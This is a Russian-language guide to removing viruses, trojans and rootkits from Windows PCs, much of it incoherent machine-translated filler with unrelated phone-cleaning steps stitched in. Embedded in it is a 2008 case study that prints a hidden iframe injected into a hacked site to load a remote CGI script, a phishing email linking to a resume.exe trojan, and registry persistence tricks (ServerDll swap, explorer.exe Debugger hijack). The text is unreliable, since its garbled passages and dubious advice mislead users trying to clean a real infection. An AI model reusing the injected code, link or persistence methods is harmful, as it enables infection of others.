Как удалить вирус из компьютера. Как удалить вирусы с компьютера самостоятельно. Удаление вирусов и троянов с компьютера вручную

Для начала нужно скачать антивирус Касперского или NOD32, чтобы провести глубокую проверку жесткого диска на наличие вредоносных программ. Желательно проводить процедуру в безопасном режиме, но предварительно использовать процедуру: загрузка последней успешной конфигурации. Скорее всего, это не вирус вывел компьютер из строя, а простой сбой в системе. Но не все знают, как войти в безопасный режим, это очень просто: во время запуска компьютера нажмите на F8, появится меню, где можно выбрать данный режим. Этот режим запускает работу WINDOWS без основных программ и драйверов, что гарантирует полную проверку на вирусы в сжатые сроки. Проблема заключается в том, что антивирусы не проверяют многие файлы, которые задействованы в работе (программы).
Нередко проверка не выявляет вирус, поэтому нужно скачать утилиту Dr.web Cureit, которая находится в свободном доступе. Вновь проведите глубокую проверку, на этот раз, скорее всего, вирусы будут обнаружены. Далее нужно провести очистку автоматической загрузки, зайдите в пуск и выберите вкладку «выполнить», потом наберите слово «msconfig». Появится настройка системы, зайдите в раздел «автозагрузка». Галочкой будут отмечены объекты, которые могли быть заражены. В большинстве случаев зараженными оказываются следующие элементы:
  • C:WINDOWSINF*.exe / %windir%system328353.exe;

  • C:WINDOWSsecuritysmss.exe / %windir%system32smphost.exe.

Это показывает загрузку вредоносного объекта. Проверьте, действительно ли вы устанавливали данные программы? Если нет – уберите с них галочки. Наиболее опасен вирус под названием svchost.exe, потому что он имеет свойство шифровки под всевозможные службы вашего компьютера. В диспетчере задач таких служб около шести, поэтому удалите данный файл в режиме автозагрузки, если он отображается. Помните, что svchost.exe не должен отображаться в автозагрузке ни в коем случае.
Далее нужно очистить остальные объекты. Чаще всего вредоносные программы попадают в папку, где хранятся файлы для восстановления WINDOWS. Разумеется, всю папку придется удалить. Очистите папку под названием temp и все временные файлы из сети интернет. Чтобы провести всю работу максимально быстро, воспользуйтесь программой Ccleaner.


Большинство вирусов изменяют атрибуты файла или папки, так что они становятся очень трудными для доступа. Некоторые из атрибутов, которые были изменены в файле или папке, являются правами на чтение, запись или выполнение в этом файле. Вирус может присутствовать в вашей системе в виде формата файла, который обладает следующими свойствами.

  • Вирус может быть скрытым от пользователя вирусом.
  • Вирус может быть файлом с разными разрешениями атрибутов.
Некоторые из известных примеров вышеупомянутых видов вирусов.

Как удалить вирусы с компьютера. Видео урок

Эта команда в основном отвечает за отображение, настройку и удаление различных атрибутов, таких как только для чтения, архивные, системные и скрытые атрибуты файла или папки. Используя эту команду, мы попытаемся изменить атрибуты, назначенные файлу, и таким образом восстановить наш файл.

Как удалить вирус в одноклассниках / в контакте

Нередко программисты подшучивают и говорят, что нужно удалять WINDOWS и вновь устанавливать. Конечно, это сработает, но есть и другие подходы. Для начала нужно , потому что то, что видит NOD32, может не увидеть Касперский и наоборот. По очереди проведите глубокую проверку на вирусы, можете оставить компьютер на ночь, если у вас совсем нет времени.
Вирусы из социальных сетей могут проникнуть в файл hosts, в нем содержатся разные строки, но в первую очередь – 127.0.0.1 localhost. Когда в него проникает вирус, появляются странные строчки, которых раньше не было. Происходит блокировка сайта «Вконтакте», поэтому проверьте hosts, он находится по адресу – C:WINDOWSsystem32driversetchosts. Там вы увидите строчки дописанные вирусом, удалите их, чтобы вернуть доступ к сайту.

Только для чтения означает, что файл не может быть записан или выполнен. . В приведенной выше команде давайте посмотрим, что представляют собой различные параметры и переключатели. Обратите внимание, что эта команда будет удалять только разные атрибуты из разных файлов.

  • Запустить командную строку в качестве администратора.
  • Однако файлы все равно будут там.
  • Теперь пришло время удалить вирус.
Надеюсь, это было бы информативно для вас.

Следуйте за каждым шагом в правильной последовательности. Если у вас есть какие-либо вопросы или подозрения, не стесняйтесь обращаться к нам за помощью. Есть некоторые обычные признаки того, что ваш компьютер заражен рекламным ПО. Если ваш компьютер говорит, что все типы всплывающих окон и сообщений на компьютере являются рекламными объявлениями. Хотя существует небольшая угроза, созданная для удаления или шифрования данных, для размещения файлов из одного источника в другое место назначения. Если вы видите этот тип проблемы. Не бойтесь, тщательно удаляйте вирус через действия. Много раз вы видите, что ваша система работает как безумная. Когда-либо он отправляет электронные письма или удаляет файлы без вашего разрешения. Это является причиной заражения вредоносными программами. Ваша система говорит на уникальном языке. Это также вызывает инфекцию. Еще одна экспоненциальная особенность многих запугиваний заключается в том, что они отключают безопасность. Появляются всплывающие окна браузера, которые сообщают о новостях или другом приложении. Случайный текст веб-страницы превращен в гиперссылки. Еще одна неоплаченная рекламная сила приложения устанавливается без разрешения пользователя.

  • Затем ваш компьютер заражен и требование безопасности.
  • Где мои файлы пропали?
  • Думаю, никто не задает этот вопрос?
Важное замечание: каждый раз обратите внимание, что когда устанавливать приложение, потому что в основном, установщик приложения содержит необязательные установки.

Как удалить вирус с флешки

Обнаружить вирус на флешке очень просто, он выдает себя, когда вы открываете флешку и появляется информация об ошибке. Происходит это очень часто, в некоторых случаях вся информация с флешки скрывается или удаляется. Причем даже проводник не помогает открыть ее, появляется ошибка на неизвестном языке, напоминающем иероглифы.
Избавиться от вируса можно следующим способом: заходите в пуск – выполнить – набираете cmd.exe и нажимаете ОК. Далее напишите в командной строке следующие команды:
  • del /a-hrs Xautorun.inf;

  • del /a-hrs Xautorun.txt;

  • del /a-hrs Xautorun.bin;

  • del /a-hrs Xautorun.wsh;

  • del /a-hrs Xautorun.reg;

  • del /a-hrs XAutorun.~ex;

  • del /a-hrs Xautorun.inf_?????

  • del /a-hrs Xautorun.srm;

  • del /a-hrs XAUTORUN.FCB.

Иксом является название вашей флешки, соответственно, вставляете его вместо буквы. Так как зараженные файлы могут находиться в папке WINDOWS – system32, нужно удалить их оттуда. Можно проверить носитель и с помощью антивирусов, но как уже говорилось выше – нужно использовать несколько антивирусов, чтобы найти все вредоносные программы. Перед тем как вставить флешку в компьютер убедитесь, что ваш антивирус активен, иначе компьютер будет заражен.

Удаляем вирус из системы.

Будьте внимательно ознакомлены с тем, какое соглашение вы принимаете перед установкой. Каждый раз выберите пользовательскую установку и снимите флажок, который не подходит или не знаком. Вам нужно игнорировать необязательное приложение для загрузки и установки. Он запускается, не спрашивая, что вы не должны выполнять это приложение, которое вы не верите.

Эта опция использовалась к тому времени, когда вредоносное всплывающее окно не позволяет закрыть окно браузера. Теперь ваше окно веб-браузера должно быть закрыто. когда вы в следующий раз откроете свой веб-браузер, не разрешите браузеру открывать последнее открытое окно. это самый простой способ закрыть веб-браузер, когда вы не можете закрыть браузер.

Что делать, если антивирус не справился со своей работой.

Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.

Эта процедура займет некоторое время. Выберите кнопку «активировать бесплатную лицензию», чтобы начать бесплатную пробную 30-дневную пробную версию и удалить все вредоносные действия с компьютера. Хотя в Интернете есть много, на что можно ответить, это всего лишь механизм хоста или инфекции, который переносит вирус с одной машины на другую. Те из вас, кто достаточно взрослый, чтобы помнить время до Интернета, несомненно, помнят, что компьютерные вирусы распространяются через изворотливые и зараженные дискеты - те, которые обычно покупаются на компьютерной ярмарке или какой-то такой открытый сбор данных.

Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда. На сайте технической поддержки Microsoft имеется специальная методика Отключения функций автозапуска в Windows
reg-файл для импорта в реестр, обеспечивающий отключение автозапуска.

К счастью, ничего подобного не произошло, хотя некоторые примеры довольно близки. Как только он там, из-за современного макияжа вредоносного ПО, его часто очень сложно удалить. Современная часть вредоносного ПО может настолько глубоко проникнуть в основную операционную систему, что у установленного антивирусного и вредоносного программного обеспечения может возникнуть большая проблема с его удалением. Итак, как мы можем бороться с такими инфекциями?

Удаление вирусов и троянов с компьютера вручную

Есть множество спасательных сред, доступных большинству, если не всем, основных антивирусных и охранных компаний. Но если вы застряли, у вас мало выбора в этом вопросе, хотя вы могли бы попросить друга сделать для вас аварийный диск или попросить местную компьютерную компанию помочь создать его.

Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.

Как избавиться от вируса с флешки?

Получайте новости, конкурсы и специальные предложения прямо на свой почтовый ящик. Это загрузочная среда, которая содержит тот же уровень антивирусного и вредоносного сканирования и защиты, который предлагает полный продукт. Вы можете загрузить последнюю версию.

Инструкция по удалению вирусов с компьютера самостоятельно

В любом случае это вполне приемлемо. По умолчанию он загрузится на ваш жесткий диск, поэтому вам придется заставить его действовать иначе. На самом деле это не так сложно, как кажется. Короче говоря, лучше проконсультироваться с руководством по материнской плате для получения дополнительной информации.

Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:

Однако, если у вас большой диск с большим количеством данных, хранящихся на нем, ожидайте некоторое время. Надеюсь, вам не придется снова проходить этот процесс. Обратите внимание, что ваше устройство внезапно стало очень медленным? Вы используете слишком много данных или показываете поврежденные данные? Если это так, вы, возможно, неосознанно скачали приложение, зараженное или выкупленное. Приложения становятся все более распространенным методом распространения вирусов на ваших мобильных устройствах, вызывая хаос и кражу важных данных.

iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.

Шаг 1: Выключите устройство, пока не найдете информацию

Поэтому, если вы все еще можете получить доступ к своему устройству, первое, что нужно сделать, - как можно скорее избавиться от зараженного приложения, прежде чем оно повлияет на другие устройства или наносит еще больший урон. Как только вы уверены, что на вас нападают какие-то вредоносные программы, вы должны удерживать кнопку питания на телефоне.

Это не пойти, чтобы предотвратить вирус или вредоносное причинить больше вреда, но вы можете предотвратить проблемы хуже и поэтому может остановить любую попытку доступа ближайших сетей. Кроме того, у вас есть время подумать и исследовать. Знаете ли вы, что приложение заражено вредоносным ПО? Знаете ли вы, что другие типы программного обеспечения могли загрузить без вашего согласия?

В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.

Если нет, обратитесь к другому компьютеру и найдите симптомы, чтобы уменьшить проблему. Если вы не можете найти зараженное приложение, вы не сможете его удалить, и проблема будет сохраняться. Кроме того, приложения могут помочь определить, какое приложение вызывает проблемы, и даже некоторые могут удалить зараженное программное обеспечение.

Основные признаки заражения компьютера

Тем не менее, он также снова даст вам доступ к Интернету в Интернете, что сопряжено с определенным риском.


Когда вы снова включаете устройство, сначала переключитесь в безопасный режим. Это поможет ограничить ущерб, который был нанесен или может сделать зараженное приложение.

Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.

В большинстве случаев вы можете переключиться в безопасный режим, удерживая кнопку питания в течение нескольких секунд после включения устройства. Это отобразит «Безопасный режим», «Аварийный режим» или аналогичные слова. Примечание. Если вы не можете понять, что вызывает проблему с вредоносным ПО, даже после загрузки приложения безопасности попросите профессионала, и вы должны очистить свой телефон. Это, несомненно, лучшая стратегия.

Шаг 3: зайдите в Настройки и найдите приложение

У настроек обычно есть значок в виде передачи, но это иногда зависит от телефона.

В разделе «Настройки» или «Параметры» прокрутите страницу вниз до тех пор, пока не увидите раздел «Приложения» и не введите. Найдите список всех ваших текущих приложений.

Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.

Шаг 4: Удалите зараженное приложение и любую другую подозрительную вещь

Когда вы там, прокрутите страницу вниз, пока не найдете зараженное приложение. Выберите приложение, а затем выберите «Удалить или принудительно закрыть».


Также неплохо проверить список приложений и удалить другие подозрительные загрузки. Если вы еще не просмотрели этот список раньше, вы можете быть удивлены некоторыми вещами, которые ваше устройство смогло автоматически загрузить.

Здравствуйте.
Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
наш фирменный бланк резюме и отправить его по адресу [email protected]
Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
позвоним Вам в течение нескольких дней. Не забудьте
указать телефон, а также позицию, на которую Вы претендуете. Желательно
также указать пожелания по окладу.
Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
http://verano-konwektor.pl/resume.exe

В некоторых случаях вы не можете просто удалить приложение. К счастью, это, как правило, легко исправить. Вам нужно будет вернуться в исходное меню «Настройки» и прокрутить вниз до «Блокировать экран и безопасность». В меню «Безопасность» найдите раздел «Администраторы телефона».

Шаг 5: Загрузите хорошую защиту от вредоносного ПО

Возможно, вам придется сначала посетить другие параметры безопасности, в зависимости от того, как настроено ваше меню.


Для этого существует ряд приложений безопасности, которые вы можете загружать и защищать свой телефон, искать вирусы и избавляться от нежелательных файлов и любого потенциально зараженного программного обеспечения. Возможно, неспособность компьютера загрузиться, по сути, связана с эффектами, которые вирусы производят в программах загрузки, а не в операционной системе.

Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.

Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
Копирую файл на другие компьютеры, где установлены различные антивирусы - просто для очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark"ом) выдает то, что есть на самом деле.
Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку - системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.

Определяем наличие вируса в системе.

1. Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.

2. Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Мне больше всего нравится простая и быстрая утилита RootkitRevealer (Скачать, 231кб) Марка Руссиновича. Можно скачать отсюда:(Скачать, 231кб) Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:

Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень "свежие" по времени создания/модификации записи или файлы (колонка "Timestamp") . Нас в первую очередь должны заинтересовать файлы с описанием (колонка "Description" ) - "Hidden from Windows API" - скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это, естественно, ненормально. Два файла - grande48.sys и Yoy46.sys - это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала - это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32 , а их копии в \system32\dllcache остались видимыми.
Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP - автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует "правильную" его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 - это тоже дополнительный признак наличия руткита в системе.

Удаляем вирус из системы.

Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.

Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.


Выбираем систему (если их несколько):


Вводим пароль администратора.
Список драйверов и служб можно просмотреть с помощью команды listsvc:


В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:


Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:


Водим команду EXIT и система уходит на перезагрузку.
После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда - http://freedrweb.ru
Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.

Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим "Выборочная проверка"). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
Разделы:
Minimal - список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
Network - то же, но с поддержкой сети.

Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше RootkitRevealer загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.

Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com . Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора "лучшего антивируса".
ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок компьютера, браузера, файлов...

Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Информация, предназначенная для диспетчера сеансов, находится в ключе реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager

Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems

то найдете значения

ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:

ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)

Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.

Поправить ситуацию можно так:

Загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
- загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.

Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:

"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
и перезагружаетесь.

В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"

Май 2008. ==

Дополнение

Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.

После удаления вируса ни один антивирус не работает.

Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
